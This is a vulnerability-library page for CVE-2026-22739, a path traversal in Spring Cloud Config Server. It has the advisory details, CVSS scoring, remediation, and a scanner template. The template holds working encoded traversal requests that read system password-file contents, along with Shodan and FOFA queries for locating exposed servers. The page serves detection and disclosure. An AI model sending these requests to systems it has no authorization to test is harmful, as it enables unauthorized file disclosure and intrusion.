/Vulnerability Library

Spring Cloud Config Server - Path Traversal

CVE-2026-22739
Verified

Description

Spring Cloud 3.1.x < 3.1.13, 4.1.x < 4.1.9, 4.2.x < 4.2.3, 4.3.x < 4.3.2, and 5.0.x < 5.0.2 contain a path traversal caused by profile parameter substitution in Config Server using native file system backend, letting attackers access files outside configured directories, exploit requires crafted request.

Severity

High

CVSS Score

8.6

Exploit Probability

9%

Affected Product

spring_cloud_config

Published Date

March 29, 2026

Template Author

0x_akoko, vulnh0lic

CVE-2026-22739.yaml
id: CVE-2026-22739

info:
  name: Spring Cloud Config Server - Path Traversal
  author: 0x_Akoko,vulnh0lic
  severity: high
  description: |
    Spring Cloud 3.1.x < 3.1.13, 4.1.x < 4.1.9, 4.2.x < 4.2.3, 4.3.x < 4.3.2, and 5.0.x < 5.0.2 contain a path traversal caused by profile parameter substitution in Config Server using native file system backend, letting attackers access files outside configured directories, exploit requires crafted request.
  impact: |
    Attackers can access arbitrary files outside intended directories, potentially exposing sensitive information
  remediation: |
    "Upgrade to versions 3.1.13, 4.1.9, 4.2.3, 4.3.2, or 5.0.2 or later.
  reference:
    - https://spring.io/security/cve-2026-22739
    - https://spring.io/blog/2026/03/23/spring-cloud-config-5-0-2-4-3-2-4-2-6-4-1-9-3-1-13-released
    - https://nvd.nist.gov/vuln/detail/CVE-2026-22739
    - https://www.herodevs.com/vulnerability-directory/cve-2026-22739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2026-22739
    epss-score: 0.09315
    epss-percentile: 0.92856
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: vmware
    product: spring_cloud_config
    shodan-query: http.html:"propertySources"
    fofa-query: body="propertySources" && body="profiles" && body="label"
  tags: cve,cve2026,spring,spring-cloud,config-server,lfi,traversal

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/application/default"

    matchers:
      - type: word
        part: body
        words:
          - "propertySources"
          - '"profiles"'
          - '"label"'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc"
      - "{{BaseURL}}/application/..%2F..%2F..%2F..%2F..%2Fetc/main"
      - "{{BaseURL}}/application/..%252F..%252F..%252F..%252F..%252Fetc"
      - "{{BaseURL}}/application/default%2C..%2F..%2F..%2F..%2F..%2Fetc"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "\"root\":\"x:0:0:"
          - "root:.*:0:0"
        condition: or

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207ae7f8d466ffc1b4c6495d85915b7e8ea962d6b84cf4db20e71a8ff6a7813780022100ecec4c511307502524ea096846360e8def718422e5d4817aa082c160a033f592:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
CVE ID:
cve-2026-22739
CWE ID:
cwe-22

References

https://spring.io/security/cve-2026-22739https://spring.io/blog/2026/03/23/spring-cloud-config-5-0-2-4-3-2-4-2-6-4-1-9-3-1-13-releasedhttps://nvd.nist.gov/vuln/detail/CVE-2026-22739https://www.herodevs.com/vulnerability-directory/cve-2026-22739

Remediation Steps

"Upgrade to versions 3.1.13, 4.1.9, 4.2.3, 4.3.2, or 5.0.2 or later.